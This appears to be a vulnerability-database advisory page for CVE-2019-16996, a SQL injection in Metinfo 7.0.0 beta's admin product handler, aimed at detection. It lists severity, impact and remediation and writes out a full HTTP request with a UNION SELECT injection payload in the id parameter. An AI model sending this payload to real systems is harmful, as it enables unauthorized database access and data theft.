🔙 목록으로 돌아가기

CVE-2019-16996: Metinfo 7.0.0 beta - SQL Injection

TitleMetinfo 7.0.0 beta - SQL Injection
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationUpgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability.
CVSS Score7.2
EPSS Score0.92241
CVE IDCVE-2019-16996
CWE IDCWE-89
Tags cve2019 cve metinfo sqli vkev vuln

🔍 Vulnerability Description

Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.

🌐 HTTP Request

GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16996.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16996.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A